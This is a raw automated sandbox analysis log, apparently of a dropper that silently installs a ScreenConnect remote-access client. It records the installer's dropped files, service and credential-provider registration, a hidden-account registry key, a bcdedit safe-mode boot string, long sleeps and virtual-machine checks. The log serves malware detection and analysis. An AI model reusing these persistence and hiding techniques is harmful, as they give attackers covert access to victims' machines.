                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  Source: 0.2.tiG6Ep202n.exe.3140000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.0.tiG6Ep202n.exe.fc78ec.4.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: tiG6Ep202n.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x56b4ca
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeCode function: 0_2_018370B0 push eax; mov dword ptr [esp], ecx0_2_018370C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF7732 push eax; iretd 8_2_00BF7739
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF7752 push 84036ACFh; iretd 8_2_00BF7759
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF5A05 pushfd ; iretd 8_2_00BF5A1A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048D9CF0 push eax; mov dword ptr [esp], ecx8_2_048D9CF1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DAFC0 push eax; mov dword ptr [esp], ecx8_2_048DAFC1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_05450523 push esp; ret 8_2_05450533
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_054542D0 push esp; ret 8_2_054542E3
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344208CD push ebx; retf 9_2_00007FFD3442098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344209D8 push ebx; retf 9_2_00007FFD3442098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344222ED push ebx; retf 9_2_00007FFD344222FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34722F5A pushfd ; iretd 9_2_00007FFD34722F5B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343F00BD pushad ; iretd 11_2_00007FFD343F00C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344008CD push ebx; retf 11_2_00007FFD3440098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344009D8 push ebx; retf 11_2_00007FFD3440098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344022B1 push ebx; retf 11_2_00007FFD344022FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344023CD push ebx; iretd 11_2_00007FFD3440240A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD34708167 push ebx; ret 11_2_00007FFD3470816A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470545A push eax; iretd 11_2_00007FFD347054A1

                                  Persistence and Installation Behavior

                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-66e1-82ebbd1a2a17}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA097.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9C7F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2267580181.000000001B6E2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: tiG6Ep202n.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 6090000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 78B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 88B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1AA50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: B20000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1A840000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472B581 rdtsc 9_2_00007FFD3472B581
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA097.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9C7F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe TID: 5048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe TID: 4208Thread sleep count: 36 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe TID: 2996Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: svchost.exe, 0000000A.00000002.3879070924.0000027B76E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3879809861.0000027B7C45D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.4031684768.0000000004670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472B581 rdtsc 9_2_00007FFD3472B581
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess token adjusted: DebugJump to behavior
